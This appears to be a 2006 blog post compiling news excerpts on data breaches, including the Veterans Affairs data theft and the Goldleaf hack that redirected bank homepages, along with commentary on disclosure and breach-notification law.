Many of the security breaches exposing personal information stored on computers happen in the United States - at least that's how it seems from media reports. The most recent of these reports being of the possible exposure of the information for over 25,000,000 American veterans who were discharged since 1975 including names, Social Security numbers and dates of birth which were stolen from a VA employee's home.

Here's a quick overview of this month's "State of the Exposure"......

...from: http://www.privacyrights.org/ar/ChronDataBreaches.htm

A list of security breaches exposing individual's information starting with the ChoicePoint incident near the beginning of 2005:

The data breaches noted [on this page] have been reported because the personal information compromised includes data elements useful to identity thieves, such as Social Security numbers, account numbers, and driver's license numbers. A few breaches that do NOT expose such sensitive information have been included in order to underscore the variety and frequency of data breaches. However, we have not included the number of individuals affected in such breaches in the total because we want this compilation to reflect breaches that expose individuals to identity theft as well as breaches that qualify for disclosure under state laws.

[...]

May 22, 2006 Dept. of Veterans Affairs (Washington, DC)

Data of all (26,500,000) American veterans who were discharged since 1975 including names, Social Security numbers and dates of birth was stolen from a VA employee's home. The employee was not authorized to take the files home to work on a data collation project. The data did not contain medical or financial information, but may have disability numerical rankings.

================= ...from: http://blogs.zdnet.com/Ou/index.php?p=238

June 1, 2006 300+ Bank homepages hacked and redirected Posted by George Ou @ 12:11 am

Goldleaf Technologies, a unit of Goldleaf Financial Solutions, Inc. which provides homepage services for financial institutions and banks had one of its servers hacked last Thursda, May 25th. I was initially alerted to this by a concerned customer who received an email notice from his bank that ALL customer passwords had been reset to their default password. Several news outlets covered the story by merely posting the Goldleaf official press release verbatim which characterized the breach as a "phishing incident" so the details were initially murky.

The AP Wire was one of the few that characterized the incident as a security breach and were quoted by a Goldleaf spokesperson that 150 to 175 sites were affected. When I asked Goldleaf's spokesperson, he characterized the AP information as wrong and told me that a little more than half of the 600 hosted bank sites were modified to redirect traffic which puts the total number of Banks affected at over 300. The homepages of those banks were modified so that they would direct all online banking traffic to a malicious site in Madrid Spain to collect login credentials from unsuspecting customers.

[...]

In Goldleaf's defense, their security administrators noticed and stopped the malicious activity within 90 minutes of the initial compromise and they immediately notified the authorities and all of the banks that they were hosting.

[...]

================ ...from: http://blogs.zdnet.com/BTL/?p=3128&tag=nl.e622

June 1, 2006 Massive, under-reported online banking breach raises serious disclosure and remedy questions Posted by David Berlind @ 11:57 am

[...]

The disclosure that has so far followed leaves much to be desired. According to a press release from GoldLeaf (one that was regurgitated word-for-word by news outlets such as Forbes under the heading of news and analysis):

Goldleaf Chief Executive Officer, Lynn Boggs, said, "We have identified and corrected the problem. We have fully restored our Web site, remote deposit and ACH services. In addition to contacting our customers, we have communicated with our vendor partners, regulators and law enforcement authorities. We are fully operational and will remain diligent in our security efforts."

What exactly was communicated isn't known. What we do know is that most of the information that has so far been made public is at best misleading and at worst, wreaks of spin control. The problem starts with the press release's headline which reads Goldleaf Technologies Responds to Phishing Attempt. That's an interesting choice of words to describe what happened here. If it was a phishing attempt, Goldleaf could easily escape any blame by deferring some of it to insecure client software (emails, browsers, etc.) and the rest to a lack of best practices on the end user's behalf. Phishing is a form of email-based social engineering that dupes users into clicking on links (in email) that they wouldn't otherwise click on.

eBay is a frequent target of phishers. Even when such phishing attempts are successful, it's hardly eBay's fault. Neither email nor phishing played a role in this exploit. End users were not social engineered. They entered their credentials as they normally would, into Web pages that were served from the domains they should have been served from. At the very least, Goldleaf needs to redisclose so that (a) it's absolutely clear that it's services were hacked and (b) phishing played no role in this attack.

[...]

Some banks, the ones we know of, notified their customers by both regular mail and email. First State Bank, one of the affected banks, sent two separate notices. The first one, signed by First State E- Banking offficer Christa Walton, has the audacity to include a link that points people to a remedy Web page that isn't even within First State's domain: an absolute no-no that is exactly the same trick used by phishers. Says that first email:

…..In an effort to ensure that all customers are aware, this same communication was mailed via US Postal Service. If, at receipt of this mailed communication, you have already obtained access to your accounts through our new Online Banking site, located at <URL masked by ZDNet>, there is no need to take any further action…..

[...]

...a second mailing reads: ...On Thursday, May 25, 2006, First State Bank became aware of an apparent attempt by an unauthorized party to gain access to our third- party website host and thus to our Online Banking site……Although there is no current evidence that customers information has been accessed, this incident may have increased the probability of your information being used for fraudulent purposes……Your Online Banking password has been defaulted back to your original password; when you established your Online Banking service….you may not have access to your original login information, First State Bank has established a help center that you may contact at 1-800-527-6335 or by email at info@first-state.net…..A temporary Online Banking login website has been established at <URL masked by ZDNet>. This temporary site is safe……

===================== ...from: http://www.wired.com/news/politics/privacy/0,70804-0.html

Microsoft Is Pushing for Privacy? By Kevin Poulsen| Also by this reporter 12:30 PM May, 03, 2006

[...]

"The states have enacted a flurry of legislation [for privacy legislation], a flurry of action," said Daniel Solove, an associate professor at the George Washington University Law School. "Industry is scared because the states are actually doing something."

The main prong of the state approach was pioneered by California's anti-identity-theft statute, SB1386, which requires companies to warn consumers of a data breach in which their information "is reasonably believed to have been acquired by an unauthorized person."

Microsoft prefers that customers be notified only when a company determines there's a "reasonable risk of a material harm happening to a consumer," said Hintze. "If the trigger is too low ... people will get notice fatigue. People will get notices all the time."

Solove argues that regardless of the language, codifying an inflexible federal standard that overpowers any state laws would be bad for consumers. "I think we're going to see a kind of net loss for privacy protection."

[...]